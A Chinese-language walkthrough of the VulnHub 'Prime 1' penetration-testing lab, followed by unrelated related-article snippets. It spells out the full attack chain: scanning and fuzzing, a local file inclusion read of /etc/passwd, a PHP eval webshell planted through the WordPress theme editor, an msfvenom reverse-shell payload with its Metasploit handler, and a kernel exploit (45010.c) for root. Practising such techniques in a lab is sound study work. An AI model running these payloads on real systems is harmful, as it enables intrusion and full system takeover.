当前位置: 首页 > article >正文

prime 1 靶场笔记(渗透测试)

环境说明:

靶机prime1和kali都使用的是NAT模式,网段在192.168.144.0/24。

Download (Mirror):

https://download.vulnhub.com/prime/Prime_Series_Level-1.rar

一.信息收集

1.主机探测:
使用nmap进行全面扫描扫描,找到目标地址及开放的端口:

nmap -A 192.168.144.0/24

发现目标主机的ip地址为192.168.144.178(判断依据:在144网段我只开放了两个主机,一个是kali,一个就是靶机(还是Ubuntu系统))

二.目录爆破

访问80端口,发现是一个图片,进行目录爆破。

使用kali的dirb工具进行爆破:

dirb http://192.168.144.178/

找到了几个目录,在逐一进行排查。


http://192.168.144.178/index.php           相当于192.168.144.178(/index.php是默认界面)

http://192.168.144.178/dev

http://192.168.144.178/wordpress/

http://192.168.144.178/dev里有这些信息。

hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking. 

你好,
现在你处于0级阶段。
在现实生活中的渗透测试中,我们应该使用我们的工具在网络上非常努力地挖掘。
快乐的黑客。

http://192.168.144.178/wordpress/ 是个wordpress的cms

既然提示我们不够努力的挖掘信息,我们就再往深里收集。还是继续使用dirb工具当然使用burp工具也是可以的。

dirb http://192.168.144.178/ -X .php,.txt,.zip

如果对drib参数不太熟悉的可以看一下这个:
Kali Linux下Dirb工具web网站目录爆破指南 - 哔哩哔哩

发现多了两个新文件:

发现image.php和index.php文件的内容是一样的。

secret.txt的内容:

Looks like you have got some secrets.
Ok I just want to do some help to you. 
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck 
Learn from here a basic tool with good usage for OSCP.
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//see the location.txt and you will get your next move//

看起来你有一些秘密。
好吧,我只是想帮你。
对你找到的php的每一页都做一些模糊处理。如果
您可以获得任何正确的参数,然后按照以下步骤操作。如果你仍然卡住了
从这里学习一个对OSCP有很好用法的基本工具。
https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
//查看location.txt,您将获得下一步行动//

三.WFUZZ工具的使用

就是想让我们去使用wfuzz工具(kali自带),要获得参数的话,还是要使用fuzz技术:

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt -u http://192.168.144.178/index.php?FUZZ

参数不了解的可以看一下这个文章:

渗透测试 10 --- 扫描 web目录 (dirb、wfuzz、wpscan、nikto)-CSDN博客

找到了file参数,如果不想翻的话,可以使用过滤进行查找,会方便很多。

 wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 -u http://192.168.144.178/index.php?FUZZ

把参数写到网址中,发现找错文件了,当然因为我还没写文件(苦笑),隐约还记得之前在secret.txt的文件说有一个location.txt的文件,咱们在进行查看。

然后就发现了,如下的提示:

翻译一下:

好吧,现在你知道确切的参数了

现在再挖一些下一个
在其他php页面上使用'secrettier360'参数可以获得更多乐趣。

意思是:让我们在别的php界面上去使用secrettier360参数,我们在信息收集的时候还发现了一个image.php的界面,去试了一下,成功找到正确的参数。

那我们就可以进行查看敏感路径了/etc/passwd

在saket用户这里发现了一个提示,我们进行尝试:发现了密码follow_the_ippsec

四.wordpress漏洞利用

于是我去试了一下靶机的登录密码,发现并不是,仔细回想一下信息收集,我们好像还有一个wordpress没有用,有概率会是它的密码

这里有个用户名,当然也可以使用bp进行爆破用户名,也是可以爆破出来的

登录成功:

我的插件也识别出来了wordpress的版本

主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。

可以在里面写入一句话木马,也可以使用反弹链接的方式。

<?php@eval($_POST['hack']);?>    输入进去,记得要保存

触发请求:可以通过下载cms的形式,找到secret.php它的路径

http://192.168.144.178/wordpress/wp-content/themes/twentynineteen/secret.php

使用蚁剑进行连接:

反弹连接也是如此:但是需要监听6666端口,也需要访问secret.php文件进行触发,我们使用msf进行完成:

制作php的payload:把payload的内容复制到secret.php文件中,并进行保存。

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.144.128 LPORT=6666 -f raw > shell2.php

启动监听:

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.144.128

set lport 6666

run

触发请求:反弹连接成功

五.权限提升

使用uname -a 查看它的ubuntu内核的版本信息

www-data@ubuntu:/tmp$ uname -a
uname -a
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64

找到符合的提权的脚本

把它复制到桌面,进行编译

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

gcc 45010.c -o 45010

把编译好的文件上传到靶机的/tmp目录下(该目录的普通用户也具有写的权限)

上传的方法:蚁剑进行上传,也可以使用msf的upload进行上传

给他加上可执行的权限:chmod +x 45010

运行:./45010

查看权限:是root,提权成功

注意如果有报错,说明kali的GLIBC的版本太高了,高版本编译的程序,无法在低版本的GLIBC环境运行。

解决方法:下载旧版kali或者使用我编译好的文件
链接: https://pan.baidu.com/s/1eM01n-EkE2cNT-MRfmkGWQ?pwd=pbz9 提取码: pbz9
最终找到flag。

相关文章:

prime 1 靶场笔记(渗透测试)

环境说明&#xff1a; 靶机prime1和kali都使用的是NAT模式&#xff0c;网段在192.168.144.0/24。 Download (Mirror): https://download.vulnhub.com/prime/Prime_Series_Level-1.rar 一.信息收集 1.主机探测&#xff1a; 使用nmap进行全面扫描扫描&#xff0c;找到目标地址及…...

实验一 字符串匹配实验

一、实验目的 1&#xff0e;熟悉汇编语言编程环境和DEBUG调试程序的使用。 2&#xff0e;掌握键盘输入字符串的方法和分支程序的设计。 二、实验内容 编程实现&#xff1a;从键盘分别输入两个字符串&#xff0c;然后进行比较&#xff0c;若两个字符串的长度…...

跨境电商中的几种支付方式——T/T、L/C、D/P、D/A、O/A

在进行跨境电商的B端系统设计时&#xff0c;需要考虑的关键方面之一是支付流程。它为交易的成功奠定了基础&#xff0c;并确保涉及的双方都受到保护。 在本文中&#xff0c;我们将深入探讨各种常见支付方式的复杂性&#xff0c;包括电汇 (T/T)、信用证 (L/C)、付款交单 (D/P)、…...

第16届蓝桥杯单片机模拟试题Ⅲ

试题 代码 sys.h #ifndef __SYS_H__ #define __SYS_H__#include <STC15F2K60S2.H> //sys.c extern unsigned char UI; //界面标志(0湿度界面、1参数界面、2时间界面) extern unsigned char time; //时间间隔(1s~10S) extern bit ssflag; //启动/停止标志…...

打造现代数据基础架构:MinIO对象存储完全指南

目录 打造现代数据基础架构&#xff1a;MinIO对象存储完全指南1. MinIO介绍1.1 什么是对象存储&#xff1f;1.2 MinIO核心特点1.3 MinIO使用场景 2. MinIO部署方案对比2.1 单节点单驱动器(SNSD/Standalone)2.2 单节点多驱动器(SNMD/Standalone Multi-Drive)2.3 多节点多驱动器(…...

OOM问题排查和解决

问题 java.lang.OutOfMemoryError: Java heap space 排查 排查手段 jmap命令 jmap -dump,formatb,file<file-path> <pid> 比如 jmap -dump:formatb,file./heap.hprof 44532 使用JVisualVM工具&#xff1a; JVisualVM是一个图形界面工具&#xff0c;它可以帮…...

OSI 七层模型与 TCP/IP 协议栈详解

OSI 七层模型与 TCP/IP 协议栈详解 网络协议模型是理解计算机网络和通信的基础&#xff0c;而 OSI 七层模型和 TCP/IP 协议栈是最常见的两种网络通信模型。虽然这两者有些不同&#xff0c;但它们都提供了一种分层的结构&#xff0c;帮助我们理解和设计网络通信。本文将详细介绍…...

「出海匠」借助CloudPilot AI实现AWS降本60%,支撑AI电商高速增长

&#x1f50e;公司简介 「出海匠」&#xff08;chuhaijiang.com&#xff09;是「数绘星云」公司打造的社交内容电商服务平台&#xff0c;专注于为跨境生态参与者提供数据支持与智能化工作流。平台基于大数据与 AI 技术&#xff0c;帮助商家精准分析市场趋势、优化运营策略&…...

LeetCode[541]反转字符串Ⅱ

思路&#xff1a; 题目给我们加了几个规则&#xff0c;剩余长度小于2k&#xff0c;大于等于k就反转k个&#xff0c;小于k就全部反转&#xff0c;我们按照这个逻辑来就行。 第一就是大于等于k就反转k个&#xff0c;我们for循环肯定是i2k了&#xff0c;接下来就是判断是否大于等于…...

队列的各种操作实现(数据结构C语言多文件编写)

1.先创建queue.h声明文件(Linux命令&#xff1a;touch queue.h)。编写函数声明如下(打开文件 Linux 操作命令&#xff1a;vim queue.h): //头文件 #ifndef __QUEUE_H__ #define __QUEUE_H__ //队列 typedef struct queue{int* arr;int in;int out;int cap;int size; }queue_t;…...

# Unity动画控制核心:Animator状态机与C#脚本实战指南 (Day 29)

Langchain系列文章目录 01-玩转LangChain&#xff1a;从模型调用到Prompt模板与输出解析的完整指南 02-玩转 LangChain Memory 模块&#xff1a;四种记忆类型详解及应用场景全覆盖 03-全面掌握 LangChain&#xff1a;从核心链条构建到动态任务分配的实战指南 04-玩转 LangChai…...

C++中extern关键字

C中extern关键字的完整用法总结 extern是C中管理链接性&#xff08;linkage&#xff09;的重要关键字&#xff0c;主要用于声明外部定义的变量或函数。以下是详细的用法分类和完整示例&#xff1a; 一、基本用法 1. 声明外部全局变量 // globals.cpp int g_globalVar 42; …...

【Python爬虫】简单案例介绍3

本文继续接着我的上一篇博客【Python爬虫】简单案例介绍2-CSDN博客 目录 3.3 代码开发 3.3 代码开发 编写代码的步骤&#xff1a; request请求科普中国网站地址url&#xff0c;解析得到类名为"list-block"的div标签。 for循环遍历这个div列表里的每个div&#xff0…...

计算机视觉与深度学习 | 视觉里程计(Visual Odometry, VO)学习思路总结

视觉里程计(Visual Odometry, VO)学习思路总结 视觉里程计(VO)是通过摄像头捕获的图像序列估计相机运动轨迹的技术,广泛应用于机器人、自动驾驶和增强现实等领域。以下是一个系统的学习路径,涵盖基础理论、核心算法、工具及实践建议:一、基础理论与数学准备 核心数学工具…...

android面试情景题详解:android如何处理断网、网络切换或低速网络情况下的业务连续性

在移动互联网时代&#xff0c;Android应用已经成为人们日常生活中不可或缺的一部分。从社交媒体到在线购物&#xff0c;从移动办公到娱乐消费&#xff0c;几乎所有的服务都依赖于网络连接。然而&#xff0c;网络环境并非总是稳定可靠。断网、网络切换&#xff08;如从Wi-Fi切换…...

swift菜鸟教程6-10(运算符,条件,循环,字符串,字符)

一个朴实无华的目录 今日学习内容&#xff1a;1.Swift 运算符算术运算符比较运算符逻辑运算符位运算符赋值运算区间运算符其他运算符 2.Swift 条件语句3.Swift 循环4.Swift 字符串字符串属性 isEmpty字符串常量let 变量var字符串中插入值字符串连接字符串长度 String.count使用…...

质变科技发布自主数据分析MCP Server

2025年4月9日&#xff0c;质变科技正式发布Relyt AI MCP&#xff08;Model Context Protocol&#xff09;&#xff0c;结合Relyt AI 在自主数据分析领域的前沿积累与MCP的开放连接能力&#xff0c;我们为用户带来了一个更智能、更灵活的数据交互生态系统。这一发布不仅拓展了Re…...

如何通过技术手段降低开发成本

通过技术手段降低开发成本的关键在于&#xff1a; 自动化工具的使用、优化开发流程、云计算资源的利用、开发技术栈的精简与创新、团队协作平台的高效管理。 其中&#xff0c;自动化工具的使用是最为有效的技术手段之一。自动化工具通过减少人工干预和重复性工作&#xff0c;大…...

Ubuntu上docker、docker-compose的安装

今天来实践下Ubuntu上面安装docker跟docker-compose&#xff0c;为后面安装dify、fastgpt做准备。 一、安装docker sudo apt-get updatesudo apt-get install docker.io 然后系统输入 docker --version 出现下图即为docker安装成功。 二、安装docker-compose 我先看下系统…...

CSS 列表样式学习笔记

CSS 列表样式提供了强大的功能&#xff0c;用于定制 HTML 列表的外观。通过 CSS&#xff0c;可以轻松地改变列表项的标记类型、位置&#xff0c;甚至使用图像作为列表项标记。以下是对 CSS 列表样式的详细学习笔记。 一、HTML 列表类型 在 HTML 中&#xff0c;主要有两种类型…...

AI云游戏盒子:未来娱乐的新纪元

AI云游戏盒子&#xff1a;未来娱乐的新纪元 随着科技的不断进步&#xff0c;人工智能&#xff08;AI&#xff09;与云计算技术的结合正在重新定义我们享受数字娱乐的方式。2025年&#xff0c;一款名为“AI云游戏盒子”的产品正逐渐成为家庭娱乐的核心设备&#xff0c;它不仅集…...

OpenCV图像处理进阶教程:几何变换与频域分析全解析

OpenCV图像处理进阶教程&#xff1a;几何变换与频域分析全解析 &#x1f4da; 本文提供了OpenCV图像处理的核心操作详解&#xff0c;从基础的几何变换到高级的频域分析&#xff0c;代码示例清晰易懂&#xff0c;实用性强。完整代码已开源至GitHub&#xff1a;https://github.co…...

AJAX与Axios基础

目录 一、AJAX 核心概念解析 1.1 AJAX 的核心概念 1.2 AJAX 工作原理 1.3 AJAX 局限性 二、axios 库介绍 2.1 Axios 核心特性 2.2 快速上手 2.3 核心配置项 2.4 错误处理标准方案 三、Axios 核心配置项 3.1 常用核心配置项 1. url 2. method 3. params 4. data …...

[OS] vDSO + vvar(频繁调用的处理) | 存储:寄存器(高效)和栈(空间大)| ELF标准包装规范(加速程序加载)

vDSO vvar 一、社区公告板系统&#xff08;类比 vDSO vvar&#xff09; 想象你住在一个大型社区&#xff0c;管理员&#xff08;内核&#xff09;需要向居民&#xff08;用户程序&#xff09;提供实时信息&#xff08;如天气预报、社区活动时间等&#xff09;。直接让每个居…...

Sentinel源码—1.使用演示和简介二

大纲 1.Sentinel流量治理框架简介 2.Sentinel源码编译及Demo演示 3.Dashboard功能介绍 4.流控规则使用演示 5.熔断规则使用演示 6.热点规则使用演示 7.授权规则使用演示 8.系统规则使用演示 9.集群流控使用演示 5.熔断规则使用演示 (1)案例说明熔断和降级 (2)Sentin…...

IDEA的常用设置(更新中......)

文章目录 1. 自动导包2. 忽略大小写3. 设置项目文件编码格式4. 设置方法之间分割线5. 设置字体大小6. 设置IDEA默认不打开项目持续更新中...... 1. 自动导包 File->Settings->Editor->General>Auto Import 2. 忽略大小写 File->Editor->General->Code…...

SQL注入之时间盲注攻击流程详解

目录 一、时间盲注原理 二、完整攻击流程 1. 注入点确认 2. 基础条件判断 3. 系统信息收集 &#xff08;1&#xff09;获取数据库版本 &#xff08;2&#xff09;获取当前数据库名 4. 数据提取技术 &#xff08;1&#xff09;表名枚举 &#xff08;2&#xff09;列名猜…...

【ROS2】行为树 BehaviorTree(三):异步操作

【ROS】郭老二博文之:ROS目录 1、简述 前面的例子中,使用过同步节点 SyncActionNode,当调用到该节点时,成功返回SUCCESS,失败返回FAILURE,并且线程会等待该节点执行完毕。 如果需要异步操作,比如节点执行需要很长时间,不能立刻返回结果,可以先去执行其它任务,等该…...

比特币不是solidity编写吗,比特币不是基于 Solidity

对&#xff01;你这个问题问得非常精准——比特币不是基于 Solidity 的&#xff0c;而且它和以太坊智能合约的设计思路也完全不同。我们来讲清楚&#x1f447; ❌ 比特币不是 Solidity 的&#xff01; &#x1f4cc; 原因如下&#xff1a; 项目智能合约语言说明比特币&#x…...

c# Kestrel

Kestrel 是 .NET 中用于 ASP.NET Core 应用程序的跨平台 Web 服务器。它是轻量级且高性能的&#xff0c;能够处理大量并发连接&#xff0c;常被用作 ASP.NET Core 应用的默认服务器。以下为你介绍 Kestrel 的基本使用和配置&#xff1a; 基本使用 创建一个简单的 ASP.NET Cor…...